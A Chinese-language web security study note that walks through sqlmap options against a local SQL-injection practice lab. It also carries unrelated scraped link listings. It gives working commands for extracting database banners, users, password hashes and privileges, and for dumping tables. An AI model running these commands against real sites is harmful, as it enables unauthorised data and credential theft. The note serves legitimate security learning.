sqlmap 检索 DBMS 信息
Web安全攻防 学习笔记
一、Sqlmap 检索 DBMS 信息
1.1、sqlmap 检索 DBMS banner
# 获取后端数据库的 banner 信息, 参数 --banner 或者 -b$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -b
1.2、sqlmap 检索 DBMS 当前数据库
# 获取当前数据库名, 参数 --current-db$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db# 当然, 每次探测新网址的时候都会有许多需要选的选择, 如果不想选可以添加一个参数 --batch 选择默认选项
1.3、sqlmap 检索 DBMS 当前主机名
# 获取主机名, 参数 --hostname$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --hostname
1.4、sqlmap 检索当前用户身份信息
# 探测当前用户是否是数据库管理员, 参数 --is-dba$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba
1.5、sqlmap 检索 DBMS 用户密码
# Sqlmap 会先列举用户, 再列举用户密码 Hash 值, 参数 --passwords# 这命令也有点鸡肋, 因为如果密码不是 Hash 值就探测不出来(而且还不太准确)$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --passwords
1.6、sqlmap 检索 DBMS 用户
# 获取 DBMS 所有用户, 参数 --users$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --users
二、sqlmap 枚举信息
2.1、sqlmap 枚举 DBMS 权限
当前用户有读取包含了数据库管理系统中用户信息的系统表的权限时使用 --privileges
参数可以列举数据库管理系统中用户的权限。通过用户权限可以判断哪些用户是管理员。
若想只枚举特定用户的权限使用参数 "-U"
指定用户,可用 "CU"
来代表当前用户。
$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --privileges -U root# 加个线程设置 --threads 5 能提高探测速度# 命令都是可以组合使用的, 不区分先后顺序
2.2、sqlmap 枚举数据库名
# 列举数据库名, 参数 --dbs$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs
2.3、sqlmap 枚举数据库表
# 列举数据库表名, 参数 --tables # 若要指定具体数据库, 添加参数: -D 数据库名字$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --tables -D security
2.4、sqlmap 枚举数据库表的列
# 列举数据库表的列, 参数 --columns# 若要指定具体库的指定具体表的列, 添加参数: -D 数据库名字 -T 数据库名字$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --columns -T users
2.5、sqlmap 枚举数据库表的值
# 列举数据库表的值, 参数 --dump$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --dump
2.6、sqlmap 枚举数据库表的条目数
# 如果用户只想知道表的条目数, 则可以使用此参数 --count$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --count
2.7、sqlmap 枚举 schema 信息
用户可用此选项列举数据库管理系统的模式。模式列表包含所有数据库、表、列、触发器 和 他们各自的类型。 同样地,可使用参数 --exclude-sysdbs
排除系统数据库。
# 如果用户只想知道表的条目数, 则可以使用此参数 --count# 东西太多就不截图了$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --schema$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --schema --exclude-sysdbs
2.8、sqlmap 获取数据信息
# --start 1 --stop 3 返回当前数据库表的第一条到第三条信息记录$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --start 3 --stop 6 --dump
2.9、sqlmap 设置条件获取信息
# 也很少用到 $ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --where="id>2" --dump
2.10、sqlmap 暴力破解表名
有些情况下用 --tables
不能列出数据库中表名来比如:
版本小于 5.0 的 MySQL 没有 information_schema 表
数据库用户权限过低无法读取表名
# 参数 --common-tables $ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --common-tables
2.10、sqlmap 暴力破解列名
# 当然要先指定表, 参数 --common-columns$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --common-columns
2.11、sqlmap 检索所有信息
# 返回所有的检索信息, 参数 -a 或者--all
练习靶场:https://www.mozhe.cn/bug/d1hJazFDeGRHV05DVjI3YXpHREZGUT09bW96aGUmozhe
sqlmap 检索 DBMS 信息相关推荐
- .net 如何设置和检索特性信息(attribute)
1. 创建一个System.Attribute的子类 [AttributeUsage( AttributeTargets.Class | AttributeTargets.Meth ...
- 写一个关键词检索全网信息的搜索引擎web
创建一个关键词检索全网信息的搜索引擎需要进行以下步骤: 确定搜索引擎的功能和目标:搜索引擎需要具备哪些功能,例如检索速度.搜索结果的准确性.搜索结果的排序和过滤等.同时还需要明确搜索引擎的目标受众是谁 ...
- 电影接口 按关键字检索影片信息
按关键字检索影片信息是APP中非常重要的一项功能,下面分享的电影接口支持按关键字检索影片信息,包括:影片的演员列表.影片的拍摄国家.影片的导演列表.影片的分类.影片的分类与评级.影片的上映时间.影片的 ...
- 无法从elasticsearch节点检索版本信息_【Elasticsearch 7 搜索之路】(一)什么是 Elasticsearch?...
本篇文章对 Elasticsearch 做了基本介绍,在后续将通过专栏的方式持续更新,本系列以 Elasticsearch7 作为主要的讲解版本,欢迎各位大佬指正,共同学习进步涨工资! 一般涉及大型数 ...
- 基于C语言的航班信息的查询与检索,航班信息的查询和检索.
题目:航班信息的查询与检索 设计一个实用的航班信息查询和检索系统,要求能对飞机航班信息进行排序和查询.可按航班的航班号.起点站.到达站.起飞时间以及到达时间等信息进行查询. 一. 模型分析 当今乘飞机 ...
- 无法检索传真服务器信息,帮助中心
1.交易协议 未经您本人同意,我们不会向第三者透露您的任何个人信息和购买记录. 您在使用信用卡.储蓄卡和其它支付方式的时候,有关个人资料在结算时将向有关的金融认证系统直接传送, 包括我们在内的任何其它 ...
- php pdf数字签名,用PHP从PDF中检索数字签名信息
一开始,请阅读关于AdobePDF中的数字签名的文章 其次,读完这个之后,你会知道签名被存储在b和c字节之间,根据/ ByteRange [a b c d]指示器 第三,我们可以从文档中提取b和c,然 ...
- b5对战一直检索服务器信息,【B5平台】求解封,服务器问题啊
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 我打一半直接卡住,然后我死了以后,退了重进就再也进不了了,休闲能进. ChangeGameUIState: CSGO_GAME_UI_STATE_MAIN ...
- 各位大佬,canoe9.0安装报错显示无法正确检索许可证信息,怎么解决!在线等挺急的!
最新文章
- 老男孩博客获三大搜素引擎搜索自然排名第一位(百度谷歌搜狗)
- 北纬39°54上的采访
- 【转】老程序猿给新程序猿的13点建议
- altium designer 去掉原理图右下角的标签栏
- asp.net考前复习——信息服务身份验证
- python界面设置-PYTHON图形化操作界面的编程七__创建菜单
- Mongodb数据库连接
- Cocos2d-x3.0游戏实例《不要救我》第十篇(结束)——使用Json配置数据类型的怪物...
- 一个程序员一月的开销统计分析、(附上PC端和移动端android源码)
- HAOI2008 硬币购物
- ue4 classuobject没有成员beginplay_UE4异步编程专题 - TFunction
- 新浪微博API应用程序接口_什么是API? 应用程序编程接口说明
- linux yum远程安装软件,Linux 自己制作yum源和实现远程yum安装
- 计算机网络中netbuie,材料内部空隙体积占其总体积的百分率叫做()。A、孔隙率B、填充率C、空隙率D、密实度...
- 使用YYLabel编写直播间消息样式
- CMMB蓄势待发,模拟电视东山再起
- 线性代数----逆矩阵的性质和求法
- 有了HTML5,Flash还能走多远?,互联网营销
- 值得推荐五个编程学习的网站
- 曼哈顿算法公式_距离计算方法总结 | Public Library of Bioinformatics
热门文章
- 水泵泵宝显示下池缺水但是水池水很满_SM-A1泵宝单相水泵控制器经济型说明书.pdf...
- 从瞳代到“瞳代”再到品牌,暴利的美瞳的变与未变
- 终端服务器安全层在协议流中检测到错误,并已取消客户端连接。客户端IP:x.x.x.解决方法
- nonebot2聊天机器人插件9:定时提醒器timing
- android Banner 广告轮播
- 朱建平:如何架构海量存储系统(附视频回放)
- align的对齐方式
- Linux C++ TCP编程
- 织梦Dedecms SEO优化技巧
- 每日优鲜的营销推广措施分析